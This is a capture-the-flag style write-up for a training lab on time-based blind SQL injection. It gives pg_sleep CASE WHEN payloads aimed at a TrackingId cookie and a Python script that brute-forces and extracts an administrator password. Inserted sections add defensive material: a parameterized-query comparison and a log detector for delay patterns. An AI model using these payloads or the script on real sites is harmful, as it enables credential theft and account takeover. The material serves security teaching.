
15 - Blind SQL injection with time delays and information retrieval

This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.

The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows or causes an error. However, since the query is executed synchronously, it is possible to trigger conditional time delays to infer information.
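To make that paragraph concrete from the defender's side, here is an added example (my own code, not the lab's or the writeup's) that runs the lab-style conditional-delay payload against two versions of the tracking-cookie lookup: one that splices the cookie value into the SQL text, as the lab application does, and one that binds it as a parameter. It assumes an in-memory SQLite database standing in for PostgreSQL, with a registered pg_sleep() function as a stand-in for the real one, a constructed tracking row, and the 10-second sleep shortened to 0.3 seconds.

```python
import sqlite3
import time

# Stand-in for PostgreSQL's pg_sleep(): SQLite has no sleep function, so one is
# registered here (assumption: close enough to the real one for timing purposes).
def _pg_sleep(seconds):
    time.sleep(seconds)
    return None  # pg_sleep returns void; NULL plays that role here


def make_db():
    """Constructed in-memory table holding one tracking id (not lab data)."""
    con = sqlite3.connect(":memory:")
    con.create_function("pg_sleep", 1, _pg_sleep)
    con.execute("CREATE TABLE tracking (id TEXT)")
    con.execute("INSERT INTO tracking VALUES ('XY4mxaMGTV84T2Gr')")
    return con


def lookup_vulnerable(con, tracking_id):
    """Cookie value concatenated into the SQL text: the lab's pattern."""
    sql = "SELECT id FROM tracking WHERE id = '" + tracking_id + "'"
    return con.execute(sql).fetchall()


def lookup_parameterized(con, tracking_id):
    """Cookie value bound as a parameter: the driver never parses it as SQL."""
    return con.execute("SELECT id FROM tracking WHERE id = ?", (tracking_id,)).fetchall()


def timed(fn, con, tracking_id):
    start = time.perf_counter()
    rows = fn(con, tracking_id)
    return rows, time.perf_counter() - start


def build_payload(condition, delay):
    """The lab's conditional-delay payload shape, with a configurable sleep."""
    return (f"XY4mxaMGTV84T2Gr'||CASE WHEN ({condition}) "
            f"THEN pg_sleep({delay}) ELSE pg_sleep(0) END||'")


def compare(condition="1=1", delay=0.3):
    """Run the same payload through both lookups and report rows and latency."""
    con = make_db()
    payload = build_payload(condition, delay)
    vuln_rows, vuln_t = timed(lookup_vulnerable, con, payload)
    safe_rows, safe_t = timed(lookup_parameterized, con, payload)
    return {
        "vulnerable_rows": vuln_rows, "vulnerable_seconds": vuln_t,
        "parameterized_rows": safe_rows, "parameterized_seconds": safe_t,
    }


if __name__ == "__main__":
    for cond in ("1=1", "1=2"):
        print(cond, compare(cond))
```

Both lookups return no rows for the injected value, so nothing in the response body distinguishes them; the concatenated version simply takes 0.3 s longer when the condition is true, which is the whole side channel the lab is built on. The parameterized version takes the same time whether the condition is true or false because the CASE expression is never interpreted as SQL, so the fix for the application is to bind the cookie value as a parameter.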

The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.

To solve the lab, log in as the administrator user.

Given: injection point (TrackingId cookie), attack type (blind, time-based), table (users), columns (username, password)
End goal: make the response take 10 seconds longer when a chosen condition is true


From the previous lab we know the injection point. This time, though, the delay has to fire only when a chosen condition is true. The following payload does that (the WHEN expression must be a boolean, so 1=1 is used as the always-true test) - '||CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END||'

(screenshot: Burp intercept)

Next I need the length of the administrator's password. The following payload can be used in Burp Intruder to find it, testing one candidate length per request - '||CASE WHEN (LENGTH((SELECT password from users where username='administrator'))=20) THEN pg_sleep(10) ELSE pg_sleep(0) END||'

(screenshot: Burp intercept)

(At 20 the response is the delayed one; compare the response timings across the payloads.)
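From the defender's side, the same response timings are what give this probing away. The added example below (my own code, not part of the writeup) scans constructed access-log lines for two signals: SQL delay functions or CASE WHEN inside cookie values, and responses far slower than the endpoint's normal latency. The log format with an rt= request-time field and the logged Cookie header, the sample lines, and the 5-second slow-response threshold are all assumptions; the third line carries the length probe above in URL-encoded form, as a server would log it.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (not from the lab). Assumed custom log format:
# combined log plus rt=<seconds> and the raw Cookie header in double quotes.
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2024:10:01:02 +0000] "GET / HTTP/1.1" 200 5120 rt=0.031 cookie="TrackingId=XY4mxaMGTV84T2Gr; session=abc"
10.0.0.5 - - [12/May/2024:10:01:09 +0000] "GET / HTTP/1.1" 200 5120 rt=0.035 cookie="TrackingId=XY4mxaMGTV84T2Gr'||CASE WHEN (1=1) THEN pg_sleep(0) ELSE pg_sleep(0) END||'; session=abc"
10.0.0.5 - - [12/May/2024:10:01:21 +0000] "GET / HTTP/1.1" 200 5120 rt=10.04 cookie="TrackingId=XY4mxaMGTV84T2Gr%27%7C%7CCASE%20WHEN%20%28LENGTH%28%28SELECT%20password%20from%20users%20where%20username%3D%27administrator%27%29%29%3D20%29%20THEN%20pg_sleep%2810%29%20ELSE%20pg_sleep%280%29%20END%7C%7C%27; session=abc"
10.0.0.9 - - [12/May/2024:10:02:00 +0000] "GET /my-account HTTP/1.1" 200 2048 rt=0.040 cookie="TrackingId=P8IUnUqqZqBKVVri; session=def"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+) rt=(?P<rt>[\d.]+) cookie="(?P<cookie>[^"]*)"$'
)

# Delay primitives of common engines plus the conditional wrapper used here.
DELAY_RE = re.compile(
    r"pg_sleep\s*\(|\bsleep\s*\(|waitfor\s+delay|benchmark\s*\(|case\s+when",
    re.IGNORECASE,
)


def parse_line(line):
    """Return a dict for one log line, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["rt"] = float(rec["rt"])
    # Decode once so percent-encoded payloads are inspected in their plain form.
    rec["cookie"] = unquote(rec["cookie"])
    return rec


def analyze(log_text, slow_seconds=5.0):
    """Flag lines whose cookie carries a delay pattern or whose response was slow."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = []
        if DELAY_RE.search(rec["cookie"]):
            reasons.append("sql-delay-pattern-in-cookie")
        if rec["rt"] >= slow_seconds:
            reasons.append(f"slow-response:{rec['rt']:.2f}s")
        if reasons:
            findings.append({"line": n, "ip": rec["ip"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

Two points worth noting: the payload lives in a cookie, so a rule that only inspects the URL and query string misses it entirely, and the 10-second sleep is what makes the latency signal obvious here, while a shorter sleep spread over many requests would lean on the keyword match and on request volume from one client instead.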


Now the password itself has to be brute-forced. Doing that by hand, or with Intruder, takes a long time, so I wrote a simple Python script that brute-forces the password one character at a time.

(Make sure to change the URL and cookie values before running.)

Code (Python):
import requests

# Lab host and cookie values from this writeup: replace them with your own.
URL = "https://0af1007403336c3a8246c913005c007e.web-security-academy.net"
TRACKING_ID = "XY4mxaMGTV84T2Gr"
SESSION = "VM38uDsbXrEI8aNMF3sU5AhNXBVGYIRf"

# Character set the password is searched over (lowercase letters and digits).
CHARSET = "abcdefghijklmnopqrstuvwxyz1234567890"

# A response slower than this is taken as pg_sleep(10) having fired; it sits
# well above normal latency but leaves room for a slow connection.
DELAY_THRESHOLD = 2.0


def is_delayed(payload):
    # Append the conditional payload to the tracking cookie and time the
    # response; the query runs synchronously, so a true condition shows as a delay.
    cookie = {'TrackingId': TRACKING_ID + payload, 'session': SESSION}
    res = requests.get(URL, cookies=cookie)
    return res.elapsed.total_seconds() > DELAY_THRESHOLD


def get_length():
    # Try candidate lengths until the LENGTH() comparison triggers the delay.
    for i in range(1, 100):
        payload = (f"'||CASE WHEN (LENGTH((SELECT password from users where "
                   f"username='administrator'))={i}) THEN pg_sleep(10) ELSE pg_sleep(0) END||'")
        if is_delayed(payload):
            return i
    return None


def get_pass(length):
    # Recover the password position by position with substr(); a delay
    # confirms the guessed character, so move on to the next position.
    passwd = ""
    for i in range(1, length + 1):
        for c in CHARSET:
            payload = (f"'||CASE WHEN (substr((SELECT password from users where "
                       f"username='administrator'),{i},1)='{c}') THEN pg_sleep(10) ELSE pg_sleep(0) END||'")
            if is_delayed(payload):
                passwd += c
                break
    return passwd


if __name__ == "__main__":
    length = get_length()
    print("[+] Length of password : ", length)
    if length is not None:
        print("[+] Password is : ", get_pass(length))

Output:
(screenshot: Burp intercept)

Go to My account and log in with the administrator credentials.

Lab solved:
(screenshot: Burp intercept)